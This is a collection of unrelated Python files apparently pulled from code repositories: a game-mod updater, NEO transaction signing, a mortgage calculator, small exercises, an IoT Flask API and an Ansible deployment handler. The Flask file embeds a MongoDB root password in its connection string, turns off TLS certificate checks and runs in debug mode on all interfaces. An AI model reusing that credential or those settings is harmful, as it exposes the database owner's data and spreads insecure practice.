for formula in ["std"]:
for minute in [59]:
for method in ["log_mse-HsuRNN-False-ckpts-forwards-more"]:
path = f"tb_logs_modded/{method}/trial1/lightning_logs/predictions{minute:02}_res.npz"
path2 = f"equinix-chicago.dirA.20160121-13{minute:02}00.ports.npy"
exp_path = f"tb_logs_modded/{method}/trial1/lightning_logs/minute{minute:02}_{formula}_small_final_results.ftr"
process_error(path, path2, exp_path, formula)
if __name__ == "__main__":
main() |
import os
import subprocess
import time
import urllib.request
from shutil import copyfile
def main():
cwd = os.getcwd()
copyfile(cwd + "/modlunky2.exe", cwd + "/modlunky2.exe.bak") # Creates temp backup
try:
os.remove(cwd + "/modlunky2.exe") # deletes current version
print("Download latest release of Modlunky2..")
# downlaods latest release on github
url = "https://github.com/spelunky-fyi/modlunky2/releases/latest/download/modlunky2.exe"
urllib.request.urlretrieve(url, cwd + "/modlunky2.exe")
print("Download Complete!")
# deletes backup once download is complete
os.remove(cwd + "/modlunky2.exe.bak")
# runs tool again and closes
subprocess.call([cwd + "/modlunky2.exe"])
# Wait for 5 seconds to give tool time to reopen
time.sleep(5)
except OSError:
# restores backup if download failed for whatever reason
copyfile(cwd + "/modlunky2.exe.bak", cwd + "modlunky2.exe")
print("Download Failed.")
if __name__ == "__main__":
main()
|
# !/usr/bin/env python
# -*- coding: utf-8 -*-
"""Crypto related wrapper functions."""
import logging
import pyswitcheo.crypto_utils as cutils
from neocore.Cryptography.Crypto import Crypto
from pyswitcheo.datatypes.fixed8 import Fixed8
from pyswitcheo.datatypes.transaction_types import (
TransactionInput,
TransactionOutput,
TransactionAttribute,
Witness,
)
logger = logging.getLogger(__name__)
MAX_TRANSACTION_ATTRIBUTE_SIZE = 65535
def serialize_transaction_output(output):
"""Serialize an object of type TransactionOutput
TransactionOutput has three params
1. assetId: assetId, Uint256
2. value: value of output, Fixed8
3. scriptHash of type Uint160
Args:
input (TransactionOutput) : TransactionOutput which needs to be serialized.
Returns:
(str) serialized version of TransactionOutput
"""
value = Fixed8(output.value).to_reverse_hex()
return "".join(
[
cutils.reverse_hex(output.assetId),
value,
cutils.reverse_hex(output.scriptHash),
]
)
def serialize_transaction_input(input):
"""Serialize an object of type TransactionInput
TransactionInput has two params
1. prevHash: Transaction hash (Uint256)
2. prevIndex: Index of the coin in the previous transaction (Uint16)
Args:
input (TransactionInput) : TransactionInput which needs to be serialized.
Returns:
(str) serialized version of TransactionInput
"""
logger.debug("serialize_transaction_input")
logger.debug(cutils.reverse_hex(input.prevHash))
logger.debug(cutils.reverse_hex(cutils.num_to_hex_string(input.prevIndex, 2)))
return cutils.reverse_hex(input.prevHash) + cutils.reverse_hex(
cutils.num_to_hex_string(input.prevIndex, 2)
)
def serialize_claim_exclusive():
"""."""
pass
def serialize_contract_exclusive():
"""."""
pass
def serialize_invocation_exclusive(transaction):
"""Short explanation.
Detailed explanation
Args:
Returns:
"""
if transaction["type"] != 0xd1:
raise TypeError("TransactionInvocation type should be 0xd1.")
out = cutils.num_to_var_int(int(len(transaction["script"]) / 2))
out += transaction["script"]
if transaction["version"] >= 1:
out += str(Fixed8.num_to_fixed_8(transaction["gas"]))
return out
def serialize_exclusive(transaction_type):
"""."""
op_type = {
2: serialize_claim_exclusive,
128: serialize_contract_exclusive,
209: serialize_invocation_exclusive,
}
return op_type[transaction_type]
def serialize_witness(witness):
"""Serialize an object of type Witness
Witness object has two params
1. invocationScript: This data is stored as is (Little Endian)
2. verificationScript: This data is stored as is (Little Endian)
Args:
input (witness) : witness which needs to be serialized.
Returns:
(str) serialized version of witness
"""
invo_len = cutils.num_to_var_int(len(witness.invocationScript) / 2)
veri_len = cutils.num_to_var_int(len(witness.verificationScript) / 2)
return invo_len + witness.invocationScript + veri_len + witness.verificationScript
def sign_transaction(transaction, priv_key):
"""Sign a transaction object returned as a part of any transaction creation using user's private key.
Args:
transaction (json) : Transaction is dictionary object which is returned after creating a transaction.
priv_key (bytes) : Private key to be used to sign this.
Returns:
A signed transaction string
"""
serialized_tx_msg = serialize_transaction(tx=transaction, signed=False)
return sign_msg(serialized_tx_msg, priv_key)
def sign_msg(msg, priv_key):
"""Sign a given message using a private key.
Args:
msg (str) : Message which needs to be signed.
priv_key (bytes) : Private key to be used to sign this.
Returns:
Signed message as a byte array.
"""
return Crypto.Sign(msg, priv_key).hex()
def serialize_transaction_attribute(attr):
"""Serialize a TransactionAttribute
Detailed explanation
Args:
Returns:
str
"""
attr_len = len(attr.data)
if attr_len > MAX_TRANSACTION_ATTRIBUTE_SIZE:
raise Exception(
"Attribute data size is beyond max attribute size {0}".format(
MAX_TRANSACTION_ATTRIBUTE_SIZE
)
)
out = cutils.num_to_hex_string(attr.usage)
if attr.usage == 0x81:
out += cutils.num_to_hex_string(attr_len / 2)
elif attr.usage == 0x90 or attr.usage >= 0xf0:
out += cutils.num_to_var_int(attr_len / 2)
if (attr.usage == 0x02) or (attr.usage == 0x03):
out += attr.data[2:64]
else:
out += attr.data
return out
def serialize_transaction(tx, signed=True):
"""Serialize a transaction object
Whenever an operation is invoked on the blockchain, we get a transaction object.
As a rest response we can pass this here to sign it.
Args:
Returns:
"""
tx_out = tx["outputs"]
tx_ins = tx["inputs"]
tx_scripts = tx["scripts"]
out = ""
out += cutils.num_to_hex_string(tx["type"])
out += cutils.num_to_hex_string(tx["version"])
out += (serialize_exclusive(tx["type"]))(tx)
out += cutils.num_to_var_int(len(tx["attributes"]))
for attribute in tx["attributes"]:
attr = TransactionAttribute(**attribute)
out += serialize_transaction_attribute(attr)
out += cutils.num_to_var_int(len(tx_ins))
for tx_in in tx_ins:
inp = TransactionInput(**tx_in)
out += serialize_transaction_input(inp)
out += cutils.num_to_var_int(len(tx_out))
for output in tx_out:
outp = TransactionOutput(**output)
out += serialize_transaction_output(outp)
if signed and tx_scripts and (len(tx_scripts) > 0):
out += cutils.num_to_var_int(len(tx_scripts))
for script in tx_scripts:
witness = Witness(**script)
out += serialize_witness(witness)
logger.debug("Final serialized transaction message to sign {0}".format(out))
return out.strip()
def sign_array(input_arr, priv_key):
"""Sign each item in an input array.
Args:
input_arr (dict) : An input array with transaction objects. This is a dictionary with "txn" key in it.
Returns:
A dictionary of signed objects, where key is the id of each element in the input_arr.
"""
signed_map = {}
for item in input_arr:
signed_map[item["id"]] = sign_transaction(item["txn"], priv_key)
return signed_map
|
__version__ = '0.0.1'
__author__ = 'czh'
from .main import TPTool
from .main import normalThread
from .webDriverPool import ChromeDriverHelper
from .threadGuiHelper import threadGuiHelper
|
#coding=utf-8
'''
Created on 2013年9月22日
@author: hongkangzy
'''
from distutils.core import setup
import py2exe
setup(
options = {
"py2exe": {
"dll_excludes": ["MSVCP90.dll"],
}
},windows=[{"script": "main.py"}])
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# Author: Hongying_Lee
# @Time: 2020/5/4
# @Name: findTheDifference
def findTheDifference(s,t):
dict_s = {}
for i in s:
if i not in dict_s:
dict_s[i] = 1
else:
dict_s[i] += 1
dict_t = {}
for j in t:
if j not in dict_t:
dict_t[j] = 1
else:
dict_t[j] += 1
for k in t:
if k not in dict_s or dict_s[k] != dict_t[k]:
return k
if __name__ == '__main__':
print(findTheDifference("aaa", "aaab"))
|
from model.amortization_schedule import AmortizationSchedule
from model.monthly_details import MonthlyDetails
class Calculator:
"""Mortgage calculation class. Calculates the monthly payment, interest, etc"""
def __init__(self):
self.last_value = 0
@staticmethod
def convert_rate_to_monthly(rate):
"""Convert the rate from an annual percentage to a monthly fraction."""
return rate / 12 / 100
@staticmethod
def convert_term_to_monthly(term):
"""Convert the term of the mortgage from number of years to number of months"""
return term * 12
@staticmethod
def calculate_monthly_payment(principal, rate, term):
"""Calculate the monthly payment for a given mortgage. This is the main formula"""
monthly_rate = Calculator.convert_rate_to_monthly(rate)
monthly_term = Calculator.convert_term_to_monthly(term)
return (monthly_rate * principal) / (1 - ((1 + monthly_rate) ** (-1 * monthly_term)))
#@staticmethod
# def calculate_loan_balance(principal, rate, term, months_elapsed):
# """ Calculate for a given mortgage, based on months_elapsed, what is the outstanding
# principal balance
# :param principal:
# :param rate:
# :param term:
# :param months_elapsed:
# :return: The balance of the principal amount yet to be re-paid
# """
# monthly_rate = Calculator.convert_rate_to_monthly(rate)
# monthly_term = Calculator.convert_term_to_monthly(term)
#
# factor = (1 + monthly_rate) ** monthly_term
#
# return (factor - ((1 + monthly_rate) ** months_elapsed)) * principal / (factor - 1)
@staticmethod
def calculate_monthly_interest(principal_balance, rate):
monthly_rate = Calculator.convert_rate_to_monthly(rate)
return principal_balance * monthly_rate
@staticmethod
def calculate_mortgage_metrics(amortization_schedule, totals):
""" Calculates the metrics for a given amortization schedule.
:param amortization_schedule: The amortization schedule that has details of the monthly payments of a mortgage
:param totals: The totals calculated for the payment, interest, etc. that are used to calculate the metrics
:return: Returns the amortization schedule with the metric values filled in
"""
metrics = {'Interest': 0, 'InterestOverPrincipal': 0}
# Once the totals are calculated, calculate the percentage metrics
metrics['Interest'] = totals['interest'] / totals['payments'] * 100
metrics['InterestOverPrincipal'] = totals[
'interest'] / totals['principal'] * 100
# Fill the calculated values into the amortization_schedule object
amortization_schedule.totals = totals
amortization_schedule.metrics = metrics
return amortization_schedule
@staticmethod
def is_time_to_make_early_payment(current_month, early_payment_frequency):
if early_payment_frequency == 0:
return False
return current_month % early_payment_frequency == 0
@staticmethod
def calculate_schedule(principal, rate, term, early_payment=0, early_payment_frequency=0):
""" Calculate the amortization schedule of a mortgage
:param principal: The Principal borrowed
:param rate: The annual rate of interest of the mortgage
:param term: The term of the mortgage in years
:return:
"""
monthly_term = Calculator.convert_term_to_monthly(term)
monthly_payment = round(Calculator.calculate_monthly_payment(principal, rate, term), 2)
principal_balance = principal
current_month = 1
amortization_schedule = AmortizationSchedule()
totals = amortization_schedule.totals
while principal_balance > 0:
if Calculator.is_time_to_make_early_payment(current_month, early_payment_frequency):
totals['early'] += early_payment
principal_balance -= early_payment
# Calculate the monthly principal and interest
monthly_interest = round(Calculator.calculate_monthly_interest(principal_balance,
rate), 2)
if principal_balance > monthly_payment:
monthly_principal = round((monthly_payment - monthly_interest), 2)
principal_balance = round((principal_balance - monthly_principal), 2)
else:
# This is typically for the last month when the balance is less than the
# monthly payment
monthly_interest = 0
monthly_principal = principal_balance
principal_balance = 0
monthly_payment = monthly_principal
# Add to the totals
totals['payments'] += monthly_payment
totals['interest'] += monthly_interest
totals['principal'] += monthly_principal
monthly_details = MonthlyDetails(current_month,
monthly_payment,
monthly_principal,
monthly_interest,
principal_balance,
round(totals['interest'], 2),
round(totals['principal'], 2),
round(totals['payments'], 2)
)
# Store the monthly payment in the amortization schedule
amortization_schedule.payment_schedule.append(monthly_details)
# Increment the month counter
current_month += 1
return Calculator.calculate_mortgage_metrics(amortization_schedule, totals)
# print(amortization_schedule)
# return amortization_schedule
|
#Calculates pi using the Gregory-Leibniz series.
from math import *
from random import *
iterations = 10000
divisor=1.0
switch=False
pie=4/divisor
for x in range(0,iterations):
divisor+=2
if switch:
pie+=4/divisor
switch=False
else:
pie-=4/divisor
switch=True
print (pie)
print
print (pi)
print
|
from flask import Flask, jsonify, request
import pymongo
from flask_cors import CORS
from os import environ
from bson.json_util import dumps
import json
app = Flask(__name__)
client = pymongo.MongoClient("mongodb+srv://root:0NqePorN2WDm7xYc@cluster0.fvp4p.mongodb.net/iot?retryWrites=true&w=majority&ssl=true&ssl_cert_reqs=CERT_NONE")
CORS(app)
db = client['fsr_rfid']
collection = db['collection']
db1 = client['fsr_rfid']
tray_in_data = db1["tray_in_updated"]
@app.route("/rfid_fsr", methods=['GET'])
def rfid_fsr():
data = collection.find()
dict_info = {}
list_data = {'04:00': 0, '05:00':0, '06:00':0, '07:00':0, '08:00':0, '09:00':0, '10:00':0, '11:00':0, '12:00':0, '13:00':0, '14:00':0, '15:00':0, '16:00':0, '17:00':0, '18:00':0, '19:00':0, '20:00':0, "21:00":0, "22:00":0, "23:00":0}
for single_data in data:
print(single_data)
fsr_status = single_data["fsr_status"]
timestamp = str(single_data["timestamp"])
rfid_status = single_data["rfid_status"]
date = timestamp.split(" ")[0]
date = date.split("-")
if date[2][0] == "0":
date = date[0] + "-" + date[1] + "-" + date[2][1:]
else:
date = date[0] + "-" + date[1] + "-" + date[2]
print(date)
time = timestamp.split(" ")[1][:5]
if date in dict_info:
temp_dict = dict_info[date]
print(temp_dict)
extracted_time = time[0:2] + ":00"
counttime = temp_dict[extracted_time]
counttime += 1
temp_dict[extracted_time] = counttime
else:
dict_info[date] = {'04:00':0, '05:00':0, '06:00':0, '07:00':0, '08:00':0, '09:00':0, '10:00':0, '11:00':0, '12:00':0, '13:00':0, '14:00':0, '15:00':0, '16:00':0, '17:00':0, '18:00':0, '19:00':0, '20:00':0, "21:00":0, "22:00":0, "23:00":0}
extracted_time = time[0:2] + ":00"
list_data[extracted_time] = 1
print(dict_info)
return json.dumps(dict_info), 200
@app.route("/tray_in", methods=["GET"])
def tray_in():
data = tray_in_data.find()
dict_info = {}
list_data = {'04:00': 0, '05:00':0,'06:00':0, '07:00':0, '08:00':0, '09:00':0, '10:00':0, '11:00':0, '12:00':0, '13:00':0, '14:00':0, '15:00':0, '16:00':0, '17:00':0, '18:00':0, '19:00':0, '20:00':0, "21:00":0, "22:00":0, "23:00":0}
for single_data in data:
print(single_data)
status_count = single_data["status_count"]
timestamp = str(single_data["timestamp"])
date = timestamp.split(" ")[0]
time = timestamp.split(" ")[1][:5]
date = date.split("-")
if date[2][0] == "0":
date = date[0] + "-" + date[1] + "-" + date[2][1:]
else:
date = date[0] + "-" + date[1] + "-" + date[2]
if date in dict_info:
temp_dict = dict_info[date]
extracted_time = time[0:2] + ":00"
counttime = temp_dict[extracted_time]
counttime += status_count
temp_dict[extracted_time] = counttime
else:
dict_info[date] = {'04:00': 0, '05:00':0,'06:00':0, '07:00':0, '08:00':0, '09:00':0, '10:00':0, '11:00':0, '12:00':0, '13:00':0, '14:00':0, '15:00':0, '16:00':0, '17:00':0, '18:00':0, '19:00':0, '20:00':0, "21:00":0, "22:00":0, "23:00":0}
extracted_time = time[0:2] + ":00"
list_data[extracted_time] = status_count
print(dict_info)
return json.dumps(dict_info), 200
@app.route("/tray_in_out", methods=['GET'])
def tray_in_out():
total_out = collection.find().count()
trolley_in = tray_in_data.find()
total = 0
for data1 in trolley_in:
total += data1['status_count']
self_in = total_out - total
data = {"CleanerReturn": total, "SelfReturn": self_in}
return json.dumps(data), 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5008, debug=True) |
from tornado.web import RequestHandler, asynchronous
from tornado.gen import coroutine
from tornado.concurrent import run_on_executor
from concurrent.futures import ThreadPoolExecutor
from tornado.httpclient import AsyncHTTPClient
import requests
import json
import os
from base.ansible_api import ANSRunner
import logging.config
import time
from base import TargetStatus
from base.resource_config import inventory_data
from base.configuration import LOG_SETTINGS
publish_base_dir = '/home/admin/eju_publish'
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('module_action')
class ModuleUpdateHandler(RequestHandler):
executor = ThreadPoolExecutor(8)
playbooks_dir = os.path.join(publish_base_dir, 'playbooks')
@asynchronous
@coroutine
def post(self):
logger.info("receive module update post")
body = self.request.body.decode()
body = json.loads(body)
logger.info("post body: {}".format(body))
# 解析参数
content = body.get('content', '')
environment = content.get('environment', '')
project = content.get('project', '')
module = content.get('module', '')
hosts = body.get('hosts')
parameters = body.get('parameters')
version_info = body.get('version_info', '')
version = version_info['version']
build = version_info['build']
file_list = version_info['file_list']
host_list = []
for host in hosts:
host_dict = dict()
host_dict["hostname"] = host['host']
host_list.append(host_dict)
resource = {
"default": {
"hosts": host_list,
"vars": {
"env": environment,
"project": project,
"module": module,
"version": version,
"build": build,
"file_list": file_list
}
},
}
jobid = body.get('jobid', '')
task_id = body.get('taskid', '')
jobname = body.get('jobname', '')
task_callback_url = body.get('callback', '')
playbook_name = jobname + '.yml'
if not environment or not project or not module or not host_list or not resource:
self.write('argument is null')
logger.info('argument is null')
self.finish()
else:
hostlist = []
for host in hosts:
hostlist.append(host['host'])
extra_vars = {
"host": hostlist
}
result_data = yield self.run_ansible(resource, extra_vars, environment, project, module, playbook_name)
logger.info("run ansible result data: {}".format(result_data))
if task_callback_url:
status = TargetStatus.success.value
messages = result_data.get('status', '')
for host_status in messages.values():
if host_status['unreachable'] > 0 or host_status['failed'] > 0:
status = TargetStatus.fail.value
call_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
callback_messages = []
for host in messages.keys():
callback_message = dict()
callback_message['host'] = host
callback_message['message'] = dict()
callback_message['message']['success'] = []
for msg in result_data.get('ok').get(host, []):
call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'success')
callback_message['message']['success'].append(call_msg)
callback_message['message']['failed'] = []
for msg in result_data.get('failed').get(host, []):
call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'failed')
callback_message['message']['failed'].append(call_msg)
callback_message['message']['unreachable'] = []
for msg in result_data.get('unreachable').get(host, []):
call_msg = "{},{},{},{}".format(call_time, jobname, msg['task'], 'unreachable')
callback_message['message']['unreachable'].append(call_msg)
if messages[host]['failed'] > 0 or messages[host]['unreachable'] > 0:
callback_message['status'] = 2
else:
callback_message['status'] = 1
callback_messages.append(callback_message)
# 阻塞
yield self.callback(task_callback_url, jobid, task_id, jobname, status, callback_messages)
if result_data:
# 这里是阻塞的,返回都为成功, 后续要加异步队列
"""
**Response Syntax**
```
Content-Type: application/json
{
"jobid":"",
"hosts" : [{"host":"10.99.70.51"},{"host":"10.99.70.52"}],
"jobname" : "demo",
"content":{"bu":"","group":"","model":""},
"parameters" : [{"k1":"v1"},{"k2":"v3"},{"k3":"v3"}],
"callback":"url"
"status":"" // 1:参数接收成功,2:参数接收失败
}
"""
response_data = {
"jobid": jobid,
"taskid": task_id,
"status": 1
}
self.write(response_data)
self.finish()
else:
logger.info('do not need callback')
response_data = {
"jobid": jobid,
"taskid": task_id,
"status": 1,
"message": result_data
}
self.write(response_data)
self.finish()
@run_on_executor
def run_ansible(self, resource, extra_vars, environment, project, module, playbook_name):
playbook_path = os.path.join(self.playbooks_dir, environment, project, module, playbook_name)
logger.info('playbook_name:{}'.format(playbook_path))
ansible_runner = ANSRunner(resource, environment, project, module)
ansible_runner.run_playbook(extra_vars=extra_vars,playbook_path=playbook_path)
result_data = ansible_runner.get_playbook_result()
return json.loads(result_data)
@run_on_executor
def callback(self, callback_url, jobid, task_id, jobname, status, messages):
payload = {
"jobid": jobid,
"taskid": task_id,
"jobname": jobname,
"status": status,
"messages": messages
}
logger.info("module action callback: payload={}".format(payload))
res = requests.post(callback_url, json=payload)
if res.status_code == requests.codes.ok:
context = res.json()
logger.info("callback success:{}".format(context))
if context['status'] == 1:
return True
else:
return False
else:
logger.error("callback fail: {}".format(payload))
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.